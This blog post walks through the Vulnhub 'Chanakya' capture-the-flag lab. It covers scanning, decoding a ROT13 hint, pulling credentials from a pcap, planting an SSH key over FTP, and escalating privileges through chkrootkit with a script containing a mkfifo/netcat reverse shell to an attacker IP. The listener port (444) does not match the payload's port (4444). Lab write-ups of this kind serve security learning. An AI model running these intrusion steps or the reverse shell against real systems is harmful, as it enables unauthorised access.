Posted on

Vulnhub Chanakya Walkthrough

We start scanning the host with nmap –A –T4 –p- 192.168.1.9 –vv

Running dirb of the host came with directories and a text file

The text file contain the word nfubxn.cpncat , it make no sense but if we go to the website https://rot13.com/ you can convert it something else ashoka.pcapng , a file which we can view in Tshark or TCPDump >> tcpick -C -yP –r   ashoka.pcapng

Now we have a username ashoka and password kautilya

We create a .ssh folder and transfer our authorized_keys from our ssh folder using the PUT command, on the host ftp service:

Mkdir .ssh

Cd /.ssh

On our machine:

Ssh-keygen

cat id_rsa.pub > authorized_keys

cp authorized_keys /root/

On the host :

Put authorized_keys

Now out of the ftp and login to ssh

ssh ashoka@192.168.1.9

In tmp folder there is a log file , reading it can tell it’s a Chkrootkit which we can exploit using:

echo ‘#!/bin/bash’ > update

echo ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.11 4444 >/tmp/f’ >> update

chmod 777 update

./update

open a connection on you machine using nc –lvp 444

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s